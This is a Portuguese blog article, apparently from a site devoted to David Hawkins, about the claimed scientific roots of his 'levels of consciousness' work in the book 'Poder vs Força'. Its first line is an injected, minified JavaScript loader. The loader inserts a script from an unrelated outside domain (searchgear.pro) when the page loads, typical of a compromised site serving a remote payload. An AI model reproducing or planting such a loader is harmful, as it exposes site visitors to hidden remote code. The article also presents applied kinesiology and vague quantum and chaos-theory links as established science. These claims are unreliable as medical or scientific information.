;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Avanços nos Estudos dos Níveis de Consciência | David Hawkins Brasil
Categorias
David Hawkins

Poder vs Força – Como os Avanços nos Estudos dos Níveis de Consciência acontecem?

Os avanços no estudo dos níveis de consciência.

Em nosso artigo anterior sobre o livro do Dr.David Hawkins, “Poder vs Força”, falamos sobre o sistema de decisões e o quanto buscamos, como humanos, as certezas para nossas dúvidas e questões. 

Nesse artigo de hoje, o assunto é sobre o avanço nos estudos dos níveis de consciência, realizado pelo Dr.Hawkins. Quais foram as influências e as premissas para o estudo? 

Pode-se dizer que o estudo dos níveis de consciência teve forte influência de 3 trabalhos, principalmente:

  1. Na Cinesiologia,  a Pesquisa Clínica na Fisiologia do Sistema Nervoso e Funcionamento Holístico do Organismo Humano que levaram ao desenvolvimento de uma nova ferramenta, a Cinesiologia. A cinesiologia, por sua vez, conecta a mente e corpo, revelando que a mente pensa com o próprio corpo.  E isso traz a oportunidade de observar como a consciência pode se revelar nos mecanismos sutis atrás das doenças
  1. Na área tecnológica, computadores com capacidade de cálculos cada vez mais rápidos, a inteligência artificial. Surge uma perspectiva revolucionária sobre os fenômenos naturais, a teoria do caos. Teóricos em diversos campos foram capazes de anunciar maneiras coerentes de entender dados que antes eram incoerentes ou não lineares, inacessíveis através da lógica probabilística.
  1. Nas ciências teóricas, as mecânicas quânticas levam à física teórica avançada. Um novo estudo de dinâmicas não lineares surge. Padrões ocultos de energia foram identificados. Esses padrões ocultos já existiam por detrás dos fenômenos naturais e antes eram designados como aleatórios.

Os impactos desses avanços

Todos esses estudos trazem resultados e impactos que ainda não são mensuráveis. O público em geral não tinha contato com essas questões, a não ser pela disseminação das imagens geométricas de fractais divulgados através de novos padrões de gráficos digitais.

Antes desse movimento, a ciência crescia a parte das bases da vida, dos processos não lineares e a medicina não fugiu disso. Ao ser apresentada à cinesiologia, a medicina a ignorou por não haver contexto dentro de seus paradigmas de realidade para compreendê-la.

No contexto da medicina, a psiquiatria sempre foi mantida a parte porque tratava exatamente das questões imensuráveis e, por isso, considerada menos científica dentro do paradigma newtoniano.

A psiquiatria é uma área não linear dentro da medicina e precisa lidar com assuntos como: intuição, tomada de decisão e todo o fenômeno da vida como um processo. A psiquiatria ainda fala pouco de amor, significado, valor ou vontade, mas pelo menos ensaia ampliar sua visão do ser humano. 

Dr. David Hawkins, pode transitar entre esses campos: científico e fenomenológico, trazendo grandes avanços à ciência e à vida. 

Leia mais sobre esse trabalho fenomenal desenvolvido por ele em seu livro “Poder vs Força”. Acompanhe nossos próximos artigos onde daremos continuidade às bases dos estudos dos níveis de consciência desenvolvidos pelo Dr.David Hawkins.

Uma resposta em “Poder vs Força – Como os Avanços nos Estudos dos Níveis de Consciência acontecem?”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *